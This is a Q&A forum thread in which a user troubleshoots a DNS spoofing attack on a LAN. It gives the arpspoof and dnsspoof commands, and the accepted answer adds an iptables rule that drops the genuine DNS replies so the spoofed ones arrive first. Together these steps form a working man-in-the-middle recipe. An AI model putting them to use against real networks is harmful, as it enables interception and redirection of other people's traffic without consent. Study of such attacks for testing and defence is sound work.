9

My aim is to DNSspoof.

My network is using a wireless router with the address 192.168.1.1 and primary DNS is the same as the router address.

I have enabled Kernel IP forward in Linux.

DNS host file is spoofhosts.txt

173.252.74.22  google.co.in

My victim machine is 192.168.1.224

I have done ARPspoof using

#sudo arpspoof -t 192.168.1.224 192.168.1.1 -i wlan0
#sudo arpspoof -t 192.168.1.1 192.168.1.224 -i wlan0

and I have done DNSspoof

ashok@c:~$ sudo dnsspoof -f spoofhosts.txt -i wlan0 host 192.168.1.224 and udp port 53
[sudo] password for ashok: 
dnsspoof: listening on wlan0 [host 192.168.1.224 and udp port 53]
192.168.1.224.15703 > 192.168.1.1.53:  32219+ A? google.co.in
192.168.1.224.15703 > 192.168.1.1.53:  32219+ A? google.co.in
192.168.1.224.14489 > 192.168.1.1.53:  3788+ A? google.co.in
192.168.1.224.14489 > 192.168.1.1.53:  3788+ A? google.co.in

I am getting the above responses, but DNSspoofing is not working for the victim.

However, I have observed in Wireshark at the victim system. It gives me this information by that I have observed that the DNS response is coming from the router faster than me.

DNS queries

See the second line that is giving the response from directly from the router with valid Google IP.

How to solve this? Is this the problem with the DNSspoof command? What happend?

Vilican
  • 2,703
  • 8
  • 21
  • 35
ashok
  • 231
  • 1
  • 3
  • 5

3 Answers3

3

Finally, I got it!

Dnsspoof can't modify DNS packet, it can only send another prepared packet with spoofed address. But the real packet comes to victim as first and victim's computer take into consideration only it.

The solve our problem is blocking the real packet. I made this using iptables with specific address in hex:

# iptables --append FORWARD --match string --algo kmp --hex-string '|e1 e0 68 2d|' --jump DROP

You can find your website target ip in hex in Wireshark or another sniffer when you connect with server in correct way.

I know this isn't the best method but it works :)

  • This worked for me as well. Converting victim IP to hex by hand or with a calculator is probably a little quicker if you didn't already have Wireshark running. e.g. `192.168.1.17` -> `'|c0 a8 01 10|'` – Cam Saul Oct 05 '17 at 22:43
  • one downside tho is this blocks all DNS responses from the gateway to the target machine so if it's not in your `dnsspoof` hosts file the victim machine won't be able to resolve it – Cam Saul Oct 05 '17 at 22:51
1

Try flushing DNS cache on all involved clients before attempting DNS spoofing.

On Windows, open a terminal an type: ipconfig /flushdns

On Linux, open a terminal and type: sudo /etc/init.d/nscd restart

On Mac OS X open a terminal and type: sudo dscacheutil -flushcache

schroeder
  • 123,438
  • 55
  • 284
  • 319
  • 2
    I have the same problem and flushing DNS cache on clients didn't work. And I think it is not practical to expect clients's DNS cache will expired while DNS spoofing. – marson parulian Apr 29 '16 at 12:58
-1

Blocking the DNS reply from the intended DNS server does not work (at least for me). The browser at the victim is waiting for the original reply and it times out if it does not arrive. The browser indicated "server timed out".